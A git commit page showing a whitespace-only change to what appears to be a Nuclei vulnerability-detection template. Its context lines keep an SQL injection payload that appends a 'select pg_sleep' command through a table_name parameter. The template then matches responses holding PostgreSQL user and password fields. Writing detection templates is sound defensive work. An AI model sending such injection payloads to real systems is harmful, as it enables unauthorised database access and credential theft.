Removed trailing spaces and added ending newline.
parent
a5ffcef441
commit
a26ce9f9f2
|
@ -29,19 +29,19 @@ requests:
|
|||
order=1&table_name=pg_user"%3b+select+pg_sleep(1)%3b+--"&limit=1&page=1
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "Content-Type: application/json"
|
||||
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"passwd":'
|
||||
- '"usename":'
|
||||
- '"usesysid":'
|
||||
- '"usesysid":'
|
||||
|
|
Loading…
Reference in New Issue